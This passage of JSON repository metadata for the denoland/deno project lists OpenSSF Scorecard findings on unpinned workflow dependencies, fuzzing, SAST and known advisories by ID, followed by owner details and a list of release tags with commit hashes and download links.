GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"h